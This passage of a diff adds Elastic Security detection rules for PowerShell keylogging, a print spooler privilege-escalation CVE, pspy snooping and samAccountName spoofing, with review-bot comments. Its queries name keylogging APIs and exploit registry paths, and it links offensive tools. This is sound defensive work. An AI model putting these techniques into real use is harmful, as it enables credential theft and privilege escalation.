This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (\n powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or \"Get-Keystrokes\") or\n powershell.file.script_block_text : (\n (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and\n (GetForegroundWindow or GetWindowTextA or GetWindowTextW or \"WM_KEYBOARD_LL\" or \"WH_MOUSE_LL\")\n )\n ) and not user.id : \"S-1-5-18\"\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n )\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Keystrokes.ps1", + "https://github.com/MojtabaTajik/FunnyKeylogger/blob/master/FunnyLogger.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the 
logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1056", + "name": "Input Capture", + "reference": "https://attack.mitre.org/techniques/T1056/", + "subtechnique": [ + { + "id": "T1056.001", + "name": "Keylogging", + "reference": "https://attack.mitre.org/techniques/T1056/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 112 + }, + "id": "bd2c86a0-8b61-4457-ab38-96943984e889_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_105.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_105.json new file mode 100644 index 00000000000..228331e24ee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_105.json 
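Review bot: The query's `and not user.id : "S-1-5-18"` clause excludes every script block executed as LocalSystem, yet neither the `description` nor the `### False positive analysis` section of the `note` explains this, so an analyst reading the guide would not know that keylogging-style scripts launched from a SYSTEM-level task or service are out of scope. The trailing `and not powershell.file.script_block_text : ("sentinelbreakpoints" and "Set-PSBreakpoint")` exception is likewise undocumented and reads as tuning for a specific product. Consider adding to the false-positive section a line such as `- Script blocks run as SYSTEM (S-1-5-18), and blocks containing both "sentinelbreakpoints" and "Set-PSBreakpoint", are excluded from this rule; review those exclusions if PowerShell runs under those contexts in your environment.` The `### Related rules` entry gives only a name and id; one clause on why that rule is related would help triage.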
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit a privilege escalation vulnerability (CVE-2020-1030) related to the print spooler service. Exploitation involves chaining multiple primitives to load an arbitrary DLL into the print spooler process running as SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler Point and Print DLL", + "query": "sequence by host.id with maxspan=30s\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\"]\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\*\"]\n", + "references": [ + "https://www.accenture.com/us-en/blogs/cyber-defense/discovering-exploiting-shutting-down-dangerous-windows-print-spooler-vulnerability", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Privilege%20Escalation/privesc_sysmon_cve_20201030_spooler.evtx", + "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1030" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bd7eefee-f671-494e-98df-f01daf9e5f17", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 105 + }, + "id": "bd7eefee-f671-494e-98df-f01daf9e5f17_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_106.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_106.json new file mode 100644 index 00000000000..40d81f2fead --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_106.json 
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit a privilege escalation vulnerability (CVE-2020-1030) related to the print spooler service. Exploitation involves chaining multiple primitives to load an arbitrary DLL into the print spooler process running as SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler Point and Print DLL", + "query": "sequence by host.id with maxspan=30s\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\SpoolDirectory\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\"]\n[registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\\\\*\\\\CopyFiles\\\\Payload\\\\Module\"\n ) and\n registry.data.strings : \"C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\*\"]\n", + "references": [ + "https://www.accenture.com/us-en/blogs/cyber-defense/discovering-exploiting-shutting-down-dangerous-windows-print-spooler-vulnerability", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Privilege%20Escalation/privesc_sysmon_cve_20201030_spooler.evtx", + "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1030" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bd7eefee-f671-494e-98df-f01daf9e5f17", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "bd7eefee-f671-494e-98df-f01daf9e5f17_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6.json new file mode 100644 index 00000000000..bb4b29d351a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Pspy Process Monitoring Detected", + "query": "sequence by process.pid, host.id with maxspan=5s\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"openat\" and file.path == \"/proc\" and\n auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n", + "references": [ + "https://github.com/DominicBreuker/pspy" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc", + "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities 
for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /proc/ -p r -k audit_proc\"\n\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": 
"T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7.json new file mode 100644 index 00000000000..9e923a20478 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Pspy Process Monitoring Detected", + "query": "sequence by process.pid, host.id with maxspan=5s\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"openat\" and file.path == \"/proc\" and\n auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n", + "references": [ + "https://github.com/DominicBreuker/pspy" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc", + "setup": "## Setup\n\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation 
capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /proc/ -p r -k audit_proc\"\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ 
+ { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_108.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_108.json new file mode 100644 index 00000000000..a577d3eff1e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_108.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privileged Escalation via SamAccountName Spoofing", + "query": "iam where event.action == \"renamed-user-account\" and\n /* machine account name renamed to user like account name */\n winlog.event_data.OldTargetUserName : \"*$\" and not winlog.event_data.NewTargetUserName : \"*$\"\n", + "references": [ + "https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e", + "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", + "https://github.com/cube0x0/noPac", + "https://twitter.com/exploitph/status/1469157138928914432", + "https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.NewTargetUserName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OldTargetUserName", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and 
default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Use Case: Vulnerability" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "bdcf646b-08d4-492c-870a-6c04e3700034_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_3.json b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_3.json new file mode 100644 index 00000000000..c840a2ffa42 --- /dev/null 
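Review bot: This high-severity rule ships with no `note` investigation guide, although the sibling `bd2c86a0-..._112` hunk shows the expected `## Triage and analysis` layout and this rule is tagged `Use Case: Vulnerability`. An analyst triaging a `renamed-user-account` hit has to work out from the query alone that the signal is a machine account (`OldTargetUserName : "*$"`) renamed to a user-style name; a short guide covering triage (confirm the rename, identify the actor account, check the renamed object's history) and remediation (apply the KB5008102 hardening already linked in `references`, review the involved accounts) would bring it in line with the other rules. The `name` value `Potential Privileged Escalation via SamAccountName Spoofing` also reads as a typo for `Privilege Escalation`, the tactic name used in the `threat` block, if the upstream rule source permits renaming.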
+++ b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_3.json 
@@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_host", + "name": "Suspicious Windows Process Cluster Spawned by a Host", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "bdfebe11-e169-42e3-b344-c5d2015533d3", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "bdfebe11-e169-42e3-b344-c5d2015533d3_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_4.json b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_4.json new file mode 100644 index 00000000000..2ddfad423b6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdfebe11-e169-42e3-b344-c5d2015533d3_4.json 
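Review bot: In the `setup` text, `Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)` is missing the `[Winlogbeat]` link label, so it renders as literal text followed by a bare URL in parentheses; `[Winlogbeat](https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)` would match the surrounding links. The pipeline name `-problem_child_ingest_pipeline` also looks as if a version prefix before the leading hyphen was lost during export, and the same shape (`-ml_dga_ingest_pipeline`) appears in the DGA rule text at the top of this chunk; if the prefix is intentionally omitted, a labelled placeholder such as `<package-version>-problem_child_ingest_pipeline` would be clearer to a reader pasting it into a Beat configuration. The same unlabelled `Winlogbeat(` text is carried into version 4 of this rule in the following hunk.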
